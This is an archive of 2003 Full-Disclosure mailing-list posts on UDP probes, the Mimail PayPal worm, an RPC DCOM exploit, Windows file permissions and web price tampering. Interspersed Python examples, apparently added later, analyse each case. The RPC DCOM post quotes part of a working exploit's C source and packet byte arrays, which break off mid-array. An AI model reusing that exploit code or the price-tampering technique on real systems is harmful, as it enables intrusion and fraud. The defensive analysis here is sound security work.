[Full-Disclosure] Increase probe on UDP port 1026

2003-12-01 Thread Irwan Hadi
During the last few hours, I've seen a huge jump in traffic to UDP
port 1026 (Windows Messaging).
I know that the exploit for MS03-043 was released around 2
weeks ago, but as far as I know that exploit only works by using UDP
port 135.
Some interesting patterns that I found in the packets that Snort
captured are:
1. One attacker host only sends one packet to the target host.
2. The attackers come from all over the world (which indicates a rapid
infection).
3. The packet always contains (00 00 00 00 00) for the message part.

Below is the Snort rule that I put in my IDS box:
alert udp !$USU_NET any -> any 1026 (msg:"MS03-043 PROBE??"; classtype:bad-unknown;)

And these are some of the packets that Snort captured:

[**] MS03-043 PROBE?? [**]
12/01-15:45:08.986417 0:D0:4:F2:4C:A -> 0:B0:D0:29:D5:40 type:0x800 len:0x3C
200.176.192.151:1042 -> 129.123.x.x:1026 UDP TTL:111 TOS:0x0 ID:33601 IpLen:20 DgmLen:30
Len: 2
0x0000: 00 B0 D0 29 D5 40 00 D0 04 F2 4C 0A 08 00 45 00  ...).@....L...E.
0x0010: 00 1E 83 41 00 00 6F 11 AA 4C C8 B0 C0 97 81 7B  ...A..o..L.....{
0x0020: 13 7E 04 12 04 02 00 0A D9 84 00 00 00 00 00 00  .~..............
0x0030: 00 00 00 00 00 00 00 00 00 00 00 00              ............

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] MS03-043 PROBE?? [**]
12/01-14:01:19.788400 0:D0:4:F2:4C:A -> 0:2:B3:C9:36:64 type:0x800 len:0x3C
81.74.106.18:26246 -> 129.123.x.x:1026 UDP TTL:106 TOS:0x0 ID:7877 IpLen:20 DgmLen:30
Len: 2
0x0000: 00 02 B3 C9 36 64 00 D0 04 F2 4C 0A 08 00 45 00  ....6d....L...E.
0x0010: 00 1E 1E C5 00 00 6A 11 C8 EA 51 4A 6A 12 81 7B  ......j...QJj..{
0x0020: 2C 48 66 86 04 02 00 0A 2C 32 00 00 00 00 00 00  ,Hf.....,2......
0x0030: 00 00 00 00 00 00 00 00 00 00 00 00              ............

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] MS03-043 PROBE?? [**]
12/01-09:28:06.146677 0:D0:4:F2:4C:A -> 0:2:B3:E7:49:84 type:0x800 len:0x3C
62.243.125.82:1194 -> 129.123.x.x:1026 UDP TTL:114 TOS:0x0 ID:6633 IpLen:20 DgmLen:30
Len: 2
0x0000: 00 02 B3 E7 49 84 00 D0 04 F2 4C 0A 08 00 45 00  ....I.....L...E.
0x0010: 00 1E 19 E9 00 00 72 11 DD 95 3E F3 7D 52 81 7B  ......r...>.}R.{
0x0020: 13 90 04 AA 04 02 00 0A A5 DD 00 00 00 00 00 00  ................
0x0030: 00 00 00 00 00 00 00 00 00 00 00 00              ............

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] MS03-043 PROBE?? [**]
12/01-15:47:16.721798 0:D0:4:F2:4C:A -> 0:8:A1:21:91:D8 type:0x800 len:0x3C
140.228.112.8:1478 -> 129.123.x.x:1026 UDP TTL:118 TOS:0x0 ID:43359 IpLen:20 DgmLen:30
Len: 2
0x0000: 00 08 A1 21 91 D8 00 D0 04 F2 4C 0A 08 00 45 00  ...!......L...E.
0x0010: 00 1E A9 5F 00 00 76 11 09 69 8C E4 70 08 81 7B  ..._..v..i..p..{
0x0020: 13 9F 05 C6 04 02 00 0A 64 0B 00 00 00 00 00 00  ........d.......
0x0030: 00 00 00 00 00 00 00 00 00 00 00 00              ............

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] MS03-043 PROBE?? [**]
12/01-13:46:34.522088 0:D0:4:F2:4C:A -> 0:8:A1:B:6F:6A type:0x800 len:0x3C
24.157.247.137:1076 -> 129.123.x.x:1026 UDP TTL:109 TOS:0x0 ID:30415 IpLen:20 DgmLen:30
Len: 2
0x0000: 00 08 A1 0B 6F 6A 00 D0 04 F2 4C 0A 08 00 45 00  ....oj....L...E.
0x0010: 00 1E 76 CF 00 00 6D 11 31 80 18 9D F7 89 81 7B  ..v...m.1......{
0x0020: 13 DE 04 34 04 02 00 0A 52 24 00 00 00 00 00 00  ...4....R$......
0x0030: 00 00 00 00 00 00 00 00 00 00 00 00              ............

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


Any idea?

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
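The three observations in the post can be checked mechanically against the dumps rather than by eye. The following is an added example, not part of the original post and not Snort code: it parses the text dump layout Snort prints (as quoted above), decodes the Ethernet, IPv4 and UDP headers, and tallies distinct sources, packets per source and whether every UDP payload is all zero bytes. The two embedded alerts are copied from the post's dumps; the text line keeps the post's "x.x" redaction of the destination.

```python
# Added example (not from the original post or from Snort): parse the text
# dumps Snort prints, decode the Ethernet/IPv4/UDP headers, and tally the
# three observations the post makes about the UDP/1026 traffic.
import re
from collections import Counter

# Constructed sample: two of the alerts quoted in the post, in Snort's dump
# layout. The text line keeps the post's "x.x" redaction of the destination.
SAMPLE_ALERTS = """\
[**] MS03-043 PROBE?? [**]
12/01-15:45:08.986417 0:D0:4:F2:4C:A -> 0:B0:D0:29:D5:40 type:0x800 len:0x3C
200.176.192.151:1042 -> 129.123.x.x:1026 UDP TTL:111 TOS:0x0 ID:33601 IpLen:20 DgmLen:30
Len: 2
0x0000: 00 B0 D0 29 D5 40 00 D0 04 F2 4C 0A 08 00 45 00  ...).@....L...E.
0x0010: 00 1E 83 41 00 00 6F 11 AA 4C C8 B0 C0 97 81 7B  ...A..o..L.....{
0x0020: 13 7E 04 12 04 02 00 0A D9 84 00 00 00 00 00 00  .~..............
0x0030: 00 00 00 00 00 00 00 00 00 00 00 00              ............

[**] MS03-043 PROBE?? [**]
12/01-14:01:19.788400 0:D0:4:F2:4C:A -> 0:2:B3:C9:36:64 type:0x800 len:0x3C
81.74.106.18:26246 -> 129.123.x.x:1026 UDP TTL:106 TOS:0x0 ID:7877 IpLen:20 DgmLen:30
Len: 2
0x0000: 00 02 B3 C9 36 64 00 D0 04 F2 4C 0A 08 00 45 00  ....6d....L...E.
0x0010: 00 1E 1E C5 00 00 6A 11 C8 EA 51 4A 6A 12 81 7B  ......j...QJj..{
0x0020: 2C 48 66 86 04 02 00 0A 2C 32 00 00 00 00 00 00  ,Hf.....,2......
0x0030: 00 00 00 00 00 00 00 00 00 00 00 00              ............
"""

# One hex-dump line: an offset, then byte pairs each preceded by one space.
# The ASCII column starts after two spaces, so the match stops before it.
HEX_LINE = re.compile(r"^0x[0-9A-Fa-f]{4}:((?: [0-9A-Fa-f]{2})+)")


def frames_from_dump(text):
    """Return one raw Ethernet frame (bytes) per [**] alert block."""
    frames, current = [], []
    for line in text.splitlines():
        if line.startswith("[**]") and current:
            frames.append(bytes.fromhex("".join(current)))
            current = []
        m = HEX_LINE.match(line)
        if m:
            current.append(m.group(1).replace(" ", ""))
    if current:
        frames.append(bytes.fromhex("".join(current)))
    return frames


def decode_udp(frame):
    """Decode Ethernet/IPv4/UDP headers; None if the frame is something else."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x00":   # not IPv4
        return None
    ihl = (frame[14] & 0x0F) * 4
    total_len = int.from_bytes(frame[16:18], "big")
    if frame[23] != 17:                                   # IP protocol 17 = UDP
        return None
    udp = 14 + ihl
    sport = int.from_bytes(frame[udp:udp + 2], "big")
    dport = int.from_bytes(frame[udp + 2:udp + 4], "big")
    ulen = int.from_bytes(frame[udp + 4:udp + 6], "big")
    return {
        "src": ".".join(map(str, frame[26:30])),
        "dst": ".".join(map(str, frame[30:34])),
        "sport": sport,
        "dport": dport,
        # UDP length covers header + data, so this excludes any trailing padding
        "payload": frame[udp + 8:udp + ulen],
        # bytes beyond the IP total length are padding up to the 60-byte minimum frame
        "padding": len(frame) - (14 + total_len),
    }


def summarize(text, port=1026):
    """Check the post's observations for every alert aimed at `port`: number of
    distinct sources, the most packets any one source sent, and whether every
    UDP payload consisted solely of zero bytes."""
    per_source = Counter()
    all_zero = True
    for frame in frames_from_dump(text):
        pkt = decode_udp(frame)
        if pkt is None or pkt["dport"] != port:
            continue
        per_source[pkt["src"]] += 1
        all_zero = all_zero and not any(pkt["payload"])
    return {
        "sources": len(per_source),
        "max_per_source": max(per_source.values(), default=0),
        "all_zero_payload": all_zero,
    }


if __name__ == "__main__":
    for f in frames_from_dump(SAMPLE_ALERTS):
        p = decode_udp(f)
        print(f"{p['src']}:{p['sport']} -> port {p['dport']} "
              f"payload={p['payload'].hex()} padding={p['padding']}")
    print(summarize(SAMPLE_ALERTS))
```

Two things the decode makes visible that the dump does not say outright: the UDP length field is 10, so the datagram carries exactly 2 bytes of payload (matching Snort's "Len: 2"), and the run of zeros after it is Ethernet padding up to the 60-byte minimum frame (len:0x3C), not message content. Note also that the hex of each dump still contains the destination address that the text line redacts as 129.123.x.x; when sharing captures, redact the hex as well.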


Re: [Full-Disclosure] HP All-in-one printers on Dells

2003-11-22 Thread Irwan Hadi
On Thu, Nov 20, 2003 at 08:44:02AM -0700, Jim Duggan wrote:

 I have a few customers using various Dell PCs, and it seems upon booting
 up with a HP all-in-one printer attached to the USB port the PC attempts
 to boot off the printer, causing boot times to exceed 20 minutes.
 Obviously it's timing out after said time but I'm wondering what the hell
 makes the Dell BIOS think it can boot off the printer, my only
 assumption would be the smart card reader.  Wondering if anyone else has
 experienced something like this and if so could give a little more
 insight.  I don't see anything short of a BIOS upgrade from Dell fixing
 this, as of now I just have the customer unplugging the printer upon
 reboots as a temp workaround.

I think at that time I resolved it by turning off support for legacy USB
applications in the BIOS, or something like that. Just go to the BIOS, and
check the settings for the USB.



Re: [Full-Disclosure] Fwd: YOUR PAYPAL.COM ACCOUNT EXPIRES

2003-11-14 Thread Irwan Hadi
On Fri, Nov 14, 2003 at 12:52:24AM -0200, Rodrigo Barbosa wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 On Thu, Nov 13, 2003 at 04:43:16PM -0800, Larry Hand wrote:
  Anyone else seeing this? It comes with an attachment Paypal.asp.scr. 
  Anyone know what it is? It sure looks suspicious.
 
 I beg your pardon, but ... suspicious ?!?! :)
 

Actually the answer just came right now:
http://www.sophos.com/virusinfo/analyses/w32mimaili.html

W32/Mimail-I is a worm which spreads via email using addresses harvested from the hard 
drive of your computer. All email addresses found on your PC are saved in a file named 
el388.tmp in the Windows folder. 
In order to run itself automatically when Windows starts up the worm copies itself to 
the file svchost32.exe in the Windows folder and adds the following registry entry: 

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SvcHost32 

The emails sent by the worm have the following characteristics: 

Subject line: YOUR PAYPAL.COM ACCOUNT EXPIRES 

Message text: 

Dear PayPal member, 

PayPal would like to inform you about some important information regarding your PayPal 
account. This account, which is associated with the email address 

[EMAIL PROTECTED] 

will be expiring within five business days. We apologize for any inconvenience that 
this may cause, but this is occurring because all of our customers are required to 
update their account settings with their personal information. 

We are taking these actions because we are implementing a new security policy on our 
website to insure everyone's absolute privacy. To avoid any interruption in PayPal 
services then you will need to run the application that we have sent with this email 
(see attachment) and follow the instructions. Please do not send your personal 
information through email, as it will not be as secure. 

IMPORTANT! If you do not update your information with our secure application within 
the next five business days then we will be forced to deactivate your account and you 
will not be able to use your PayPal account any longer. It is strongly recommended 
that you take a few minutes out of your busy day and complete this now. 

DO NOT REPLY TO THIS MESSAGE VIA EMAIL! This mail is sent by an automated message 
system and the reply will not be received. 

Thank you for using PayPal. 

Attached file: www.paypal.com.scr 

If you run the worm, a dialog box pops up requesting you to enter a range of 
information about your credit card. This includes your full credit card number, your 
PIN, the expiry date, and even the so-called CVV code (this is an additional 
three-digit security code printed on the back of your card which is not recorded by 
credit card machines during transactions). The dialog includes a PayPal logo in a 
further attempt to appear legitimate. Information entered into the form is sent out by 
email. 

Note: do not act on web links or attachments sent to you in emails which claim to come 
from banks or financial companies. The apparent source of an email is too easily 
forged. 
 
 


  --  Forwarded Message  --
  
  Subject: YOUR PAYPAL.COM ACCOUNT EXPIRES
  Date: Fri, 14 Nov 2003 03:29:00 -0500
  From: PayPal.com [EMAIL PROTECTED]
  To: [EMAIL PROTECTED]
 
 - -- 
 Rodrigo Barbosa [EMAIL PROTECTED]
 Quid quid Latine dictum sit, altum viditur
 Be excellent to each other ... - Bill  Ted (Wyld Stallyns)
 
 -BEGIN PGP SIGNATURE-
 Version: GnuPG v1.2.1 (GNU/Linux)
 
 iD8DBQE/tENnpdyWzQ5b5ckRAsuCAJ9m25kwTnpwR7oV9jaeSKmVg0v8MACgkmbV
 TThDx7KiEGijiGOhBnr5BwU=
 =ro3i
 -END PGP SIGNATURE-
 



Re: [Full-Disclosure] Fwd: YOUR PAYPAL.COM ACCOUNT EXPIRES

2003-11-14 Thread Irwan Hadi
On Thu, Nov 13, 2003 at 07:44:27PM -0600, Rachael Treu wrote:

 Delete it or forward it to [EMAIL PROTECTED]
 
 Headers (at least on the copy I received) identify the man behind
 the curtain as...
 
 From [EMAIL PROTECTED]  Thu Nov 13 17:28:51 2003
 Return-Path: [EMAIL PROTECTED]
 Received: from 81.249.20.142 (APuteaux-111-1-5-142.w81-249.abo.wanadoo.fr
 +[81.249.20.142])

I don't think yahoo.com has anything to do with this, since the culprit is one user from
wanadoo.fr.
He just spoofed some email @yahoo.com.

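The two Mimail messages above give a mail gateway two usable signals: the Sophos write-up names the subject line and the executable .scr attachment, and the header excerpt shows a From address at yahoo.com on a message that actually entered from a wanadoo.fr host. The following added example (not from the thread, from Sophos, or from any mail product) applies both checks to a constructed message built with Python's email library. The .scr filename, the spoofed From domain and the originating wanadoo.fr host are the ones quoted in the thread; the local parts, the recipient, the relay name and the attachment bytes are placeholders.

```python
# Added example (not from the thread, Sophos or any mail tool): two checks a
# mail gateway can apply to the message described above. Local parts, the
# recipient, the relay and the attachment bytes are constructed; the From
# domain, the wanadoo.fr origin host and the .scr filename come from the thread.
import os
import re
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from email.utils import parseaddr

# Attachment extensions Windows runs as programs; .scr is the one Mimail used.
RISKY_EXT = {".scr", ".pif", ".exe", ".com", ".bat"}

# "from <claimed name> (<reverse-dns name> [<ip>])" as the receiving MTA writes it
RECEIVED_FROM = re.compile(r"from\s+(\S+)\s*\(([^)]*)\)", re.I)


def build_sample():
    """Constructed message modelled on the headers quoted in the thread."""
    msg = EmailMessage()
    msg["Received"] = ("from 81.249.20.142 "
                       "(APuteaux-111-1-5-142.w81-249.abo.wanadoo.fr [81.249.20.142]) "
                       "by mx.example.com; Thu, 13 Nov 2003 17:28:51 -0600")
    msg["From"] = "PayPal.com <paypal-notice@yahoo.com>"   # placeholder local part
    msg["To"] = "member@example.com"                       # placeholder recipient
    msg["Subject"] = "YOUR PAYPAL.COM ACCOUNT EXPIRES"
    msg.set_content("Dear PayPal member, ... run the application that we have "
                    "sent with this email (see attachment) ...")
    msg.add_attachment(b"MZ placeholder bytes, not the worm", maintype="application",
                       subtype="octet-stream", filename="www.paypal.com.scr")
    return msg.as_bytes()


def from_domain(msg):
    """Domain of the address in From:, lower-cased; None if absent."""
    addr = parseaddr(str(msg.get("From", "")))[1]
    return addr.rpartition("@")[2].lower() or None


def origin_domain(msg):
    """Registered-looking domain (last two labels) of the first hop's reverse-DNS
    name. Each MTA prepends its Received: header, so the last one is the earliest."""
    received = msg.get_all("Received") or []
    if not received:
        return None
    m = RECEIVED_FROM.search(str(received[-1]))
    if not m or not m.group(2).split():
        return None
    rdns = m.group(2).split()[0].strip("[]")
    if rdns.replace(".", "").isdigit():      # bare IP literal, no reverse DNS
        return rdns
    labels = rdns.lower().split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else rdns.lower()


def risky_attachments(msg):
    """Filenames of attachments whose extension Windows would execute."""
    return [part.get_filename() for part in msg.iter_attachments()
            if os.path.splitext(part.get_filename() or "")[1].lower() in RISKY_EXT]


def assess(raw):
    """Return both signals for a raw RFC 822 message: a From: domain that does
    not match where the mail actually entered, and executable attachments."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    sender, origin = from_domain(msg), origin_domain(msg)
    return {
        "subject": str(msg.get("Subject", "")),
        "from_domain": sender,
        "origin_domain": origin,
        "spoof_suspected": bool(sender and origin and sender != origin),
        "risky_attachments": risky_attachments(msg),
    }


if __name__ == "__main__":
    print(assess(build_sample()))
```

The domain mismatch is a heuristic, not a verdict: legitimate mail is routinely injected through a third party's relay, so on its own it only raises suspicion. Combined with an executable attachment it is a strong enough signal to quarantine, which is the combination Mimail-I presents.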


Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Irwan Hadi
On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage) wrote:

 For us that can not interpret the site, what more information can be
 provided.

I believe if you use babelfish.altavista.com, you'll come to:
http://forum.securitylab.ru/forum_posts.asp?TID=5642&PN=0&TPN=3

The code itself is:

#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

FILE *fp1; 
unsigned char bindstr[]={ 
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
 
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; 

unsigned char request1[]={ 
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E 
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D 
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF 
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E 
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 

Re: [Full-Disclosure] Internet Explorer (BAN IT !!!)

2003-10-09 Thread Irwan Hadi
On Thu, Oct 09, 2003 at 07:54:08AM +1000, gregh wrote:

 
 - Original Message - 
 From: Stephen [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Sent: Thursday, October 09, 2003 5:19 AM
 Subject: [Full-Disclosure] Internet Explorer (BAN IT !!!)
 
 
 
  It becomes really dangerous to use IE ...
 
  http://www.k-otik.com/WMPLAYER-TEST/
 
  God bless Mozilla
 
  http://www.mozilla.org/
 
 
 
 Your test didn't work on my IESP1 under XP with all patches excepting
 811394. Absolutely no effect on WMP. My original WMP remains and works.

It depends whether you were logged in as a privileged user or not.
If not, then your browser can't delete the wmplayer.exe file, because
the only users that can change/delete the wmplayer.exe file are privileged
users.
C:\PROGRA~1\Windows Media Player>cacls wmplayer.exe
C:\PROGRA~1\Windows Media Player\wmplayer.exe BUILTIN\Users:R
                                              BUILTIN\Power Users:C
                                              BUILTIN\Administrators:F
                                              NT AUTHORITY\SYSTEM:F


C:\PROGRA~1\Windows Media Player>

The problem is just too many people are running their Windows with
Full Privileges.

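The cacls listing in the message is the whole argument: a browser running as a member of Users holds only R on wmplayer.exe, so it cannot delete the file, while a user logged in as a Power User or Administrator can. The following added example (not from the thread or from Microsoft) parses cacls output in exactly that layout and reports which principals can delete a file and which non-administrative principals can modify it. The listing is the one quoted above; the set of principals treated as expected administrators is an assumption.

```python
# Added example (not from the thread or from Microsoft): parse the output
# format of cacls shown in the message and report who can modify or delete
# the file. The listing is the one quoted; EXPECTED_ADMINS is an assumption.
import re

WMPLAYER = r"C:\PROGRA~1\Windows Media Player\wmplayer.exe"

# Constructed copy of the cacls listing quoted in the message
SAMPLE_CACLS = r"""C:\PROGRA~1\Windows Media Player\wmplayer.exe BUILTIN\Users:R
                                              BUILTIN\Power Users:C
                                              BUILTIN\Administrators:F
                                              NT AUTHORITY\SYSTEM:F
"""

# cacls rights letters: N none, R read, W write, C change, F full control.
# W, C and F allow changing the file; C and F additionally allow deleting it.
MODIFY_RIGHTS = {"W", "C", "F"}
DELETE_RIGHTS = {"C", "F"}
EXPECTED_ADMINS = {r"BUILTIN\Administrators", r"NT AUTHORITY\SYSTEM"}  # assumption

# "<principal>:<optional (OI)(CI) inheritance flags><rights letter>"
ACE = re.compile(r"^(?P<who>.+?):(?P<rights>(?:\([A-Z]+\))*[A-Z])$")


def parse_cacls(output, path):
    """Return [(principal, rights)] for `path` from cacls text output.
    cacls prints the path in front of the first entry, so it is stripped off."""
    aces = []
    for line in output.splitlines():
        entry = line.strip()
        if entry.startswith(path):
            entry = entry[len(path):].strip()
        m = ACE.match(entry)
        if m:
            aces.append((m.group("who"), m.group("rights")))
    return aces


def can_delete(aces, principal):
    """True if `principal` holds a right that allows deleting the file."""
    return any(who == principal and rights[-1] in DELETE_RIGHTS
               for who, rights in aces)


def unexpected_modifiers(aces, admins=EXPECTED_ADMINS):
    """Principals other than the expected administrators that can change the file."""
    return [who for who, rights in aces
            if rights[-1] in MODIFY_RIGHTS and who not in admins]


if __name__ == "__main__":
    acl = parse_cacls(SAMPLE_CACLS, WMPLAYER)
    for who in (r"BUILTIN\Users", r"BUILTIN\Power Users"):
        print(f"{who} can delete wmplayer.exe: {can_delete(acl, who)}")
    print("non-admin principals that can modify it:", unexpected_modifiers(acl))
```

For the listing in the message this reports that Users cannot delete the file, Power Users can, and Power Users is the one non-administrative principal with modify rights. cacls shows a simplified view of the DACL (a single letter per entry), so treat its output as a first screen; the underlying ACE may carry specific rights the letter does not express.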


Re: [Full-Disclosure] Red Hat Certification for... (however much you want to pay)

2003-10-01 Thread Irwan Hadi
On Wed, Oct 01, 2003 at 09:18:51PM -0400, Justin Shin wrote:

 If I had my druthers at redhat, someone aint gonna have a job come thursday mornin
 
 What's more, I played around and came to amusement with the fact that I had just 
 made the security course cost me 0.99 . Talk about cheap! Why, Redhat should invest 
 in training their coders, and avoid being duped by the oldest technique in webapp 
 history...
 

Even more funny, I set it to be -$8098082308 and redhat now owes me that
much ;)

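What the two posters describe (a course priced at 0.99, then at a large negative amount) is the classic web-application flaw of letting the client send the price back with the order. The following added example, not from the thread or from Red Hat's site, assumes that is what happened and shows the vulnerable order handler beside a hardened one that only accepts an item id and a quantity, plus a detection helper that flags a submitted price that disagrees with the catalogue. The shop code, catalogue, item id and price are all constructed.

```python
# Added example (not from the thread or from Red Hat): the "trust the client's
# price" flaw beside its fix. Catalogue, item id and price are constructed.
from decimal import Decimal, InvalidOperation

CATALOGUE = {"rh-security-course": Decimal("2498.00")}   # constructed price
MAX_QTY = 10


def vulnerable_total(form):
    """Before: the submitted form carries the price and the server believes it.
    A price of 0.99, or a negative one, is simply accepted."""
    return Decimal(form["price"]) * int(form["qty"])


def hardened_total(form):
    """After: the client may only choose an item and a quantity. The price is
    looked up server-side and the quantity must be a small positive integer."""
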